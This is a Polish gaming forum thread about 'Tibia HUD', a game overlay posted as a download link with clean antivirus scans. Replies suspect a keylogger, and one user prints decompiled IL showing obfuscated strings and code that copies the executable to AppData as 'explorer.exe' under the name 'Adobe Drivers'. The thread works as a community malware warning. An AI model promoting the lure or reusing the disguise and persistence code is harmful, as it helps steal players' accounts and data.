Tibiahud

[Trele Morele]

Witam. Przedstawiam wam program Tibia HUD w wersji 1.1. Jest to program, który nie ingeruje w Tibię, dodaje samego HUD'a - czyli exp/h, ile zostało potków, runek, best hit, last hit, info zaznaczonego monstera (pokazuje również loota jakiego możemy dostać z danego moba!). Jest to można powiedzieć nakładka na Tibię. Program pisany w C++, .net framework nie wymagany. Śmigam na tym już dobre 2 miesiące, żadnego bana. Znalezione na zagranicznej stronce (nie pamiętam jakiej, chyba Tibiaug). Odpalamy po uruchomieniu Tibii, bądź też przed w celu zobaczenia interfejsu lub innych opcji. Pozdrawiam.

 

LINK:

http://www25.zippyshare.com/v/99162832/file.html

 

SKANY:

VirusChief.com

Antivir: Nothing found

ArcaVir: Nothing found

AVG: Nothing found

BitDefender: Nothing found

VirusBlokAda32: Nothing found

VirusBuster: Nothing found

 

Report overview

Scanned by viruschief.com

-------------------------------------------

Virusscan.jotti.org

http://virusscan.jotti.org/pl/scanresult/522b78a7b7ccd16a9cb5f213eb07888f105059bf

-------------------------------------------

VirSCAN.org

http://virscan.org/report/4e7b81bf284d2100a4e1e56cc8fb17dd.html

[Trele Morele]

Zapraszam do komentowania.

[Trele Morele]

REFRESH!

[SirMarthes]

Hmmm, niech wypowie się ktoś kto to pobrał i komu to działa. Moim zdaniem to jest keylogger. Użytkownik ma 3 posty i od razu daje jakieś link do pobrania. Waga: Size: 0.05 MB (chyba trochę mała, i jeszcze w .exe, nie powinno być w czymś innym?)

[Wiw3K]

Hmmm, niech wypowie się ktoś kto to pobrał i komu to działa. Moim zdaniem to jest keylogger. Użytkownik ma 3 posty i od razu daje jakieś link do pobrania. Waga: Size: 0.05 MB (chyba trochę mała, i jeszcze w .exe, nie powinno być w czymś innym?)

więc, plik wygląda* na czysty po zeskanowaniu na stronach typu "virusscan", po zobaczeniu* co jest w środku wygląda na to ze program jest napisany w Visual Studio a nie jak autor tematu podaje w C++, to po 1. Po 2 w kodzie jest coś o rejestrach oraz o folderach. po 3 są tu funkcje potrzebne do wysyłania / odbierania informacji, ale sa też takie których nie idzie zobaczyć więc myśle że auto zapakował plik

 

Zapakowane =

To jest ukryta treść, proszę

• Zaloguj się
• lub
• Zarejestruj się

 

a tutaj kod mniej więcej co TibiaHud robi:

.method private static specialname void .cctor()

{

newobj void iwjZHr::.ctor()

call void lBxVScjtDmXFFsETSG::set_lpiw(class iwjZHr WithEventsValue)

ldstr "UTDUOnNu4AnP+hIcFCLFjRTAzk1dVhmf"

ldstr "VfGHCSrQUyTtjhdUeidm"

call class System.String lBxVScjtDmXFFsETSG::DRwUGNqIewKgUERnnrD(class System.String fyjmaSrSZOmgfqUkSer, class System.String ggdfyIDoHUURQNE)

stsfld class System.String lBxVScjtDmXFFsETSG::gqaVfUmCR

ldstr "6cSWV8b4mziiFSLCxrsofA=="

ldstr "SpjgGfAkgTnlreXtBgGZ"

call class System.String lBxVScjtDmXFFsETSG::DRwUGNqIewKgUERnnrD(class System.String fyjmaSrSZOmgfqUkSer, class System.String ggdfyIDoHUURQNE)

stsfld class System.String lBxVScjtDmXFFsETSG::RqtoJBTwoU

ldc.i4.1

stsfld bool lBxVScjtDmXFFsETSG::ynf

ldc.i4.1

stsfld bool lBxVScjtDmXFFsETSG::mXwldT

ldstr "C:\\Documents and Settings\\SysOp\\Dane aplikacji\\Microsoft\\Local\\"

stsfld class System.String lBxVScjtDmXFFsETSG::GVd

ldstr "explorer.exe"

stsfld class System.String lBxVScjtDmXFFsETSG::jXyFVsFUyWIKUM

ldstr "u75NG61p95"

stsfld class System.String lBxVScjtDmXFFsETSG::uXDatsffTFrEQ

ldstr "Adobe Drivers"

stsfld class System.String lBxVScjtDmXFFsETSG::ffesqTmSwaGef

ldc.i4.1

stsfld bool lBxVScjtDmXFFsETSG::DYRjrtfBvipaa

ldc.i4.1

stsfld bool lBxVScjtDmXFFsETSG::TEA

ldc.i4.1

stsfld bool lBxVScjtDmXFFsETSG::olMdyjA

ldstr "{e2tm48F6-E5f7-4mC0-84F6-6Q4aotd23JLJ}"

stsfld class System.String lBxVScjtDmXFFsETSG::tSrgU

ldsfld class System.String lBxVScjtDmXFFsETSG::GVd

ldsfld class System.String lBxVScjtDmXFFsETSG::jXyFVsFUyWIKUM

call class System.String [mscorlib]System.String::Concat(class System.String, class System.String)

stsfld class System.String lBxVScjtDmXFFsETSG::GYhawkfnStSyIgnr

ldstr "sc49CKaayY"

stsfld class System.String lBxVScjtDmXFFsETSG::efgRYwB

ldstr "ER3sbuQxYWDaUn2Kp5rqc+4mJMP6ozPvURGuEZ+xT6JDlNZOYyK6Q5PglWEsOQI8rlLSDmF4n8l0rIH8TDyLCo20ZweLvCESU3LZ1LZM/jDU2T+dM60xqfj22F4TTdlMcjtbXLtxsPDHR02ZD8zFu5yF+P9/nacfH6zfkvpC+vw0/FyGfcdwXUEnmjxywSLOwXojFVciKybEOvjiL48erg=="

ldsfld class System.String lBxVScjtDmXFFsETSG::efgRYwB

call class System.String lBxVScjtDmXFFsETSG::DRwUGNqIewKgUERnnrD(class System.String fyjmaSrSZOmgfqUkSer, class System.String ggdfyIDoHUURQNE)

stsfld class System.String lBxVScjtDmXFFsETSG::IAyaCX

ret

}

już widać ze coś nie tak ;]

 

zauważyłem również żę on kopiuje jakieś pliki czy coś w tym stylu + tutaj widać że to jest napisane w VisualBasic:

 

loc_7FA: // CODE XREF: fdjs+85j

ldc.i4.4

stloc.2

call class My.MyComputer My.MyProject::get_Computer()

callvirt class [Microsoft.VisualBasic]Microsoft.VisualBasic.MyServices.FileSystemProxy [Microsoft.VisualBasic]Microsoft.VisualBasic.Devices.ServerComputer::get_FileSystem()

call class System.String [system.Windows.Forms]System.Windows.Forms.Application::get_ExecutablePath()

ldsfld class System.String lBxVScjtDmXFFsETSG::GVd

ldstr "\\"

ldsfld class System.String lBxVScjtDmXFFsETSG::jXyFVsFUyWIKUM

call class System.String [mscorlib]System.String::Concat(class System.String, class System.String, class System.String)

ldc.i4.2

ldc.i4.2

callvirt void [Microsoft.VisualBasic]Microsoft.VisualBasic.MyServices.FileSystemProxy::CopyFile(class System.String, class System.String, value class [Microsoft.VisualBasic]Microsoft.VisualBasic.FileIO.UIOption, value class [Microsoft.VisualBasic]Microsoft.VisualBasic.FileIO.UICancelOption)

 

Nie polecam używania tego pliku, oraz innych plików niezweryfikowanego pochodzenia lub od użytkowników mających < 30+- postów.